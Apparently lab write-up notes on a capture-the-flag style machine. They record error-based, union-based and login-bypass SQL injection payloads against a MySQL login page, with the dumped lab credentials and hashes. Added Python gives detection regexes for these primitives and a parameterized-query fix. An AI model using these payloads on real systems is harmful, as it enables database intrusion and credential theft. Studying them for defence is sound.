SQL Injection
The discovered login page appears to be vulnerable to SQL injection: sending a single quote character, ', in the username parameter resulted in a SQL error.
Based on the error message alone, the backend appears to be MySQL.
Error-based In-band
' AND UPDATEXML(1337,CONCAT('.','~',(SELECT version()),'~'),31337) -- //
Using the UPDATEXML method. The version is 8.0.41
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT database()),'~')) -- //
Using the EXTRACTVALUE method. The current database is blazeDB
' AND GTID_SUBSET(CONCAT('~',(SELECT current_user()),'~'),1337) -- //
Using the GTID_SUBSET method. The current user is admin@localhost
Databases (Error-based In-band)
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT schema_name FROM information_schema.schemata),'~')) -- //
This errors because the subquery returns more than one row; a single row is expected
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT schema_name FROM information_schema.schemata LIMIT 1),'~')) -- //
Using LIMIT to set the number of rows returned, 1 in this case; it is the first one from the top. There is a DB, mysql
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 1),'~')) -- //
Using OFFSET to change the row. There is the default information_schema DB
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 2),'~')) -- //
Using OFFSET to change the row. There is the default performance_schema DB
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 3),'~')) -- //
Using OFFSET to change the row. There is the default sys DB
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 4),'~')) -- //
Using OFFSET to change the row. There is the current blazeDB DB
blazeDB
Table (Error-based In-band)
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT table_name FROM information_schema.tables WHERE table_schema="blazeDB" LIMIT 1 OFFSET 0),'~')) -- //
The sole blazeDB.users table discovered
blazeDB.users
Columns (Error-based In-band)
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT column_name FROM information_schema.columns WHERE table_schema="blazeDB" AND table_name='users' LIMIT 1 OFFSET 0),'~')) -- //
The blazeDB.users.id column found
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT column_name FROM information_schema.columns WHERE table_schema="blazeDB" AND table_name='users' LIMIT 1 OFFSET 1),'~')) -- //
The blazeDB.users.name column found
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT column_name FROM information_schema.columns WHERE table_schema="blazeDB" AND table_name='users' LIMIT 1 OFFSET 2),'~')) -- //
The blazeDB.users.password column found
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT column_name FROM information_schema.columns WHERE table_schema="blazeDB" AND table_name='users' LIMIT 1 OFFSET 3),'~')) -- //
The blazeDB.users.phone-number column found
' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT column_name FROM information_schema.columns WHERE table_schema="blazeDB" AND table_name='users' LIMIT 1 OFFSET 4),'~')) -- //
The blazeDB.users.username column found
blazeDB.users
Credential Exfiltration (Error-based In-band)
' AND GTID_SUBSET(CONCAT('~',(SELECT password FROM blazeDB.users WHERE username='admin' LIMIT 1 OFFSET 0),'~'),1337) -- //
Password exfiltrated for the admin user: canttouchhhthiss@455152
mysql.user
Credential Exfiltration (Error-based In-band)
' AND GTID_SUBSET(CONCAT('~',(SELECT user FROM mysql.user LIMIT 1 OFFSET 0),'~'),1337) -- //
The admin user
' AND GTID_SUBSET(CONCAT('~',(SELECT password FROM mysql.user WHERE user='admin'),'~'),1337) -- //
canttouchhhthiss@455152 is the password, the same as the web credential
' AND GTID_SUBSET(CONCAT('~',(SELECT user FROM mysql.user LIMIT 1 OFFSET 5),'~'),1337) -- //
The default root account
' AND GTID_SUBSET(CONCAT('~',(SELECT password FROM mysql.user WHERE user='root'),'~'),1337) -- //
canttouchhhthiss@455152 is the password, the same as the web credential and that of the admin user
Additionally, it leaked the web root directory: /var/www/blaze.offsec
Read Access (Error-based In-band)
' AND GTID_SUBSET(CONCAT('~',(SELECT LOAD_FILE('/etc/passwd')),'~'),1337) -- //
No output; likely access denied
Union-based In-band
' UNION SELECT NULL,NULL,NULL,NULL,NULL -- //
There are 5 columns, as enumerated above
' UNION SELECT NULL,@@version,NULL,NULL,NULL -- //
It’s the 2nd column that is visible
The version is 8.0.41-0ubuntu0.20.04.1
' UNION SELECT NULL,user(),NULL,NULL,NULL -- //
The current user is admin@localhost
' UNION SELECT NULL,database(),NULL,NULL,NULL -- //
The current DB is blazeDB
Databases (Union-based In-band)
' UNION SELECT NULL,schema_name,NULL,NULL,NULL FROM information_schema.schemata-- //
5 DBs:
mysql
information_schema
performance_schema
sys
blazeDB
blazeDB
Table (Union-based In-band)
' UNION SELECT NULL,table_name,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema="blazeDB" -- //
The sole blazeDB.users table discovered
blazeDB.users
Columns (Union-based In-band)
' UNION SELECT NULL,column_name,NULL,NULL,NULL FROM information_schema.columns WHERE table_schema='blazeDB' AND table_name='users' -- //
5 columns:
blazeDB.users.id
blazeDB.users.name
blazeDB.users.password
blazeDB.users.phone-number
blazeDB.users.username
blazeDB.users
Credential Exfiltration (Union-based In-band)
' UNION SELECT NULL,GROUP_CONCAT(username,':',password),NULL,NULL,NULL FROM blazeDB.users -- //
Credential exfiltrated: admin:canttouchhhthiss@455152
mysql.user
Credential Exfiltration (Union-based In-band)
' UNION SELECT NULL,GROUP_CONCAT(user,':',authentication_string),NULL,NULL,NULL FROM mysql.user -- //
Credential exfiltrated:
admin:$A$005$Qg/"*JP
s!rrkudEg,JuvICGCXAsSpnRB83RwsEHL7G/XKu8Mlg7pkbGc/0PB
debian-sys-maint:005]SW<Ixv#ZK[@TBcaGf6Oko5CBq1m15xfVMg9n1oodw45BFgV7epnhBL5`
`mysql.infoschema:ATHISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
mysql.session:005ATHISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
root:`
Unfortunately, some characters could not be rendered.
Read Access (Union-based In-band)
' UNION SELECT NULL,LOAD_FILE('/etc/passwd'),NULL,NULL,NULL -- //
No output; likely access denied
Write Access (Union-based In-band)
' UNION SELECT NULL,"test",NULL,NULL,NULL INTO OUTFILE "/var/www/blaze.offsec/test.txt"-- //&password=
Access denied
Time-based Blind
The word sleep is blacklisted: the user is redirected to the blocked page. benchmark seems to be blocked as well.
N/A
Automated
The time-based attack succeeded but broke the web app, so it is not viable
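As an added defensive example (not part of the original notes), the following Python flags, in web-server log lines, the SQL primitives that the error-based, union-based and file-access probes above rely on, and compares that with the app's own sleep/benchmark word blacklist, which stops the time-based probe but none of the others. The log lines, their body encoding and the blacklist check are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the page): method, path, URL-encoded POST body.
SAMPLE_LOG = [
    "POST /login.php username=bob&password=qwe",
    "POST /login.php username=%27+AND+EXTRACTVALUE%281337%2CCONCAT%28%27.%27%2C%27~%27%2C%28SELECT+database%28%29%29%2C%27~%27%29%29+--+%2F%2F&password=qwe",
    "POST /login.php username=%27+UNION+SELECT+NULL%2Cschema_name%2CNULL%2CNULL%2CNULL+FROM+information_schema.schemata--+%2F%2F&password=qwe",
    "POST /login.php username=%27+UNION+SELECT+NULL%2C%22test%22%2CNULL%2CNULL%2CNULL+INTO+OUTFILE+%22%2Fvar%2Fwww%2Fblaze.offsec%2Ftest.txt%22--+%2F%2F&password=",
    "POST /login.php username=%27+AND+SLEEP%285%29+--+%2F%2F&password=qwe",
    "POST /login.php username=o%27brien&password=qwe",
]

# The application's own defence, as described in the notes: a word blacklist.
APP_BLACKLIST = ("sleep", "benchmark")

# Primitives that the error-based, union-based and file-access probes rely on.
SIGNATURES = {
    "error_based": re.compile(r"\b(EXTRACTVALUE|UPDATEXML|GTID_SUBSET)\s*\(", re.I),
    "union_select": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "file_access": re.compile(r"\bLOAD_FILE\s*\(|\bINTO\s+(OUTFILE|DUMPFILE)\b", re.I),
    "time_based": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "comment_terminator": re.compile(r"--\s|#|/\*"),
}

def decode_params(line):
    """Return {name: URL-decoded value} for the body part of one logged request."""
    parts = line.split(" ", 2)
    params = {}
    for pair in (parts[2] if len(parts) == 3 else "").split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def blacklist_blocks(line):
    """What the app's blacklist does: block only when a listed word is present."""
    return any(w in v.lower() for v in decode_params(line).values() for w in APP_BLACKLIST)

def classify(line):
    """Sorted names of the signatures that fire on any parameter value of the line."""
    hits = set()
    for value in decode_params(line).values():
        for name, pattern in SIGNATURES.items():
            # A lone apostrophe (o'brien) is legitimate; a comment terminator only
            # counts when the same value also carries a quote to break out with.
            if name == "comment_terminator" and "'" not in value:
                continue
            if pattern.search(value):
                hits.add(name)
    return sorted(hits)
```

Decode before matching: every payload on this page arrives URL-encoded, so a rule applied to the raw body would see %27 and %28 rather than the quote and parenthesis.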
Authentication Bypass
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/cockpit]
└─$ ffuf -X POST -c -w /usr/share/wordlists/seclists/Fuzzing/Databases/MySQL-SQLi-Login-Bypass.fuzzdb.txt -u http://$IP/login.php -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=FUZZ&password=qwe' -ic -mc all
________________________________________________
:: Method : POST
:: URL : http://192.168.152.10/login.php
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Fuzzing/Databases/MySQL-SQLi-Login-Bypass.fuzzdb.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=FUZZ&password=qwe
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
'OR 1=1-- [Status: 200, Size: 806, Words: 81, Lines: 16, Duration: 23ms]
'OR '' = ' Allows authentication without a valid username. [Status: 302, Size: 769, Words: 69, Lines: 29, Duration: 23ms]
<username>'-- [Status: 200, Size: 808, Words: 81, Lines: 16, Duration: 24ms]
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1-- [Status: 200, Size: 809, Words: 81, Lines: 16, Duration: 24ms]
<username>' OR 1=1-- [Status: 302, Size: 632, Words: 48, Lines: 16, Duration: 25ms]
:: Progress: [5/5] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
'OR '' = ' works
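The bypass works because login.php evidently splices the username straight into its SQL string. As an added example (not the application's code), the following Python shows that query shape beside a parameterized one, using an in-memory SQLite table that mirrors the blazeDB.users columns; the payload is the `<username>' OR 1=1--` entry from the ffuf run with admin substituted, and the table contents and the query shape are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for blazeDB.users with the column names enumerated
# in the notes; row values are made up. SQLite is used only so this runs offline.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute('CREATE TABLE users (id INTEGER, name TEXT, password TEXT, '
                '"phone-number" TEXT, username TEXT)')
    con.execute("INSERT INTO users VALUES (1, 'Admin', 'made-up-secret', '000', 'admin')")
    return con

def login_vulnerable(con, username, password):
    """Assumed shape of the vulnerable statement: input is pasted into the SQL text,
    so a quote closes the literal and '--' comments out the password check."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in con.execute(sql)]

def login_safe(con, username, password):
    """Parameterized statement: the driver binds the values, so a quote stays data
    and the whole payload is compared against the username column as a string."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(sql, (username, password))]

def authenticated(con, username, password, query=login_safe):
    """True only when exactly one row matches the submitted credentials."""
    return len(query(con, username, password)) == 1
```

The plaintext password column mirrors what the notes recovered from blazeDB.users; hashing it is a separate fix from parameterizing the query.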